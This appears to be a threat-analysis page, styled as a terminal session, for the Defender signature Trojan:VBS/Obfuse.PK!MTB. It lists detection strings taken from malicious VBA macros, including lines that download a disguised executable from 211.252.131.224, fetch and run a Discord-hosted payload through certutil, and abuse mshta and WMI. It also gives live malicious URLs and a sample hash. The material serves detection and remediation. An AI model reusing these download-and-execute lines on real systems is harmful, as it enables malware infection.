user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:VBS/Obfuse.PK!MTB
Trojan:VBS/Obfuse.PK!MTB - Windows Defender threat signature analysis

Trojan:VBS/Obfuse.PK!MTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:VBS/Obfuse.PK!MTB
Classification:
Type:Trojan
Platform:VBS
Family:Obfuse
Detection Type:Concrete
Known malware family with identified signatures
Variant:PK
Specific signature variant within the malware family
Suffix:!MTB
Detected via machine learning and behavioral analysis
Detection Method:Behavioral
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for VBScript platform, family Obfuse

Summary:

This is a VBScript-based Trojan utilizing obfuscation and WMI to download a malicious executable, disguised as a GIF, from a remote server (211.252.131.224). It renames the downloaded file to an .exe and executes it via cmd.exe, leading to system compromise.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - GetObject("w" & "i" & "n" & "m" & "gmt" & "s" & ":\\" &  (MACROHSTR_EXT)
 -  & "\ro" & "ot\ci" & "mv2" & ":W" & "in3" & "2_P" & "roc" & "e" & "s" & "s").Create (MACROHSTR_EXT)
 - = ActiveDocument.Variables("d3a8e88c97d").Value (MACROHSTR_EXT)
 - .Namespace( (MACROHSTR_EXT)
 - ).Self.InvokeVerb "Paste" (MACROHSTR_EXT)
 -  + "\LCSSW.txt" As  (MACROHSTR_EXT)
 -  + "\LCSSW.js" (MACROHSTR_EXT)
 -  + "\LCSSW.txt") = "" Then (MACROHSTR_EXT)
 - Application.Wait (Now + TimeValue("0:00:02")) (MACROHSTR_EXT)
 - If InStr(1, Sh.Name, "Object", 1) Then (MACROHSTR_EXT)
 - Sh.Copy (MACROHSTR_EXT)
 - Url = "http://211.252.131.224/2021/image/4qmal.gif (MACROHSTR_EXT)
 - Download_Go.SaveToFile "C:\Temp\4qmal.gif", 2 (MACROHSTR_EXT)
 - = VBA.CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - = "/c " & "rename " & "C:\Temp\4qmal.gif 4qmal.exe" (MACROHSTR_EXT)
 - wsh.Run "C:\Windows\System32\cmd.exe " & cmdText, (MACROHSTR_EXT)
 - CreateObject("Wscript.Shell").EXEC  (MACROHSTR_EXT)
 - = VBA.Replace("msh (MACROHSTR_EXT)
 - = " http://j.mp/" (MACROHSTR_EXT)
 - Debug.Print MsgBox("Re-Install Office", vbOKCancel); returns; 1 (MACROHSTR_EXT)
 - ubun3.Tag (MACROHSTR_EXT)
 - gando.uganda (MACROHSTR_EXT)
 - = "://www.bitly.com/" (MACROHSTR_EXT)
 - .copyfile "C:\Windows\System32\mshta.exe", Environ("PUBLIC") & "\peee.com", True (MACROHSTR_EXT)
 - "ERROR !!!": Call VBA.Shell _ (MACROHSTR_EXT)
 - .adnoc-distributions.com/projects/enquiry.zip (MACROHSTR_EXT)
 - C:\Users\" & Environ("UserName") & "\Documents (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell").SpecialFolders("MyDocuments") (MACROHSTR_EXT)
 - ShellApp.Namespace(unzipToPath).CopyHere ShellApp.Namespace(zippedFileFullName).Items (MACROHSTR_EXT)
 - paralagloire.com/ (MACROHSTR_EXT)
 -  /11.p (MACROHSTR_EXT)
 - abnewslive.in/ (MACROHSTR_EXT)
 -  /11.pn (MACROHSTR_EXT)
 - onceayearpestcontrol.c (MACROHSTR_EXT)
 - PID = Shell("cmd /c certutil.exe -urlcache -split -f ""https://cdn.discordapp.com/attachments/948578823983726726/948721348170121296/Lqohpshnd.exe"" Rqmmcqpluzlffudaxshi.exe.exe && Rqmmcqpluzlffudaxshi.exe.exe", vbHide) (MACROHSTR_EXT)
 - /ces/ten.snd-cimanyd.ognompux//: (MACROHSTR_EXT)
 - start-process($env:temp+ '\ (MACROHSTR_EXT)
 - .vbs (MACROHSTR_EXT)
 - C:\Users\Public\update.js (MACROHSTR_EXT)
 - winmgmts:','C:\ (MACROHSTR_EXT)
 - ProgramData\ (MACROHSTR_EXT)
 - ddond.com (MACROHSTR_EXT)
 - mediafire.com/file/vwt2u87jfzpb0f4/3.htm/file (MACROHSTR_EXT)
 - = SCQU.Open(v0df + "\cPxNX.bat") (MACROHSTR_EXT)
 - ").Value) (MACROHSTR_EXT)
 - () + "\cPxNX.bat" 'you can specify here the text file name you want to create (MACROHSTR_EXT)
 - com/file/p3ay4it08j1s7hp/0main.htm/file (MACROHSTR_EXT)
 - https://taxfile.mediafire. (MACROHSTR_EXT)
 - C:\x5cProgramData\x5cddond.com (MACROHSTR_EXT)
 - = "C:\Users\Public\update.js" (MACROHSTR_EXT)
 - "C:\Users\" & Environ("UserName") & "\ (MACROHSTR_EXT)
 - " + "." + "ps1" (MACROHSTR_EXT)
 - ").Shellexecute  (MACROHSTR_EXT)
 -  .Tag,  (MACROHSTR_EXT)
 -  .Tag (MACROHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: Hotnail_Company_Updates.vbs
0cba8f95a87418faf019a814d7a277762786b89d4dc04af045d02a39329a2293
09/01/2026
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected endpoint. Perform a full system scan with updated antivirus software to remove all malicious components. Block the identified C2 IP address (211.252.131.224) at your network perimeter and investigate for persistence mechanisms or further lateral movement.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 09/01/2026. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$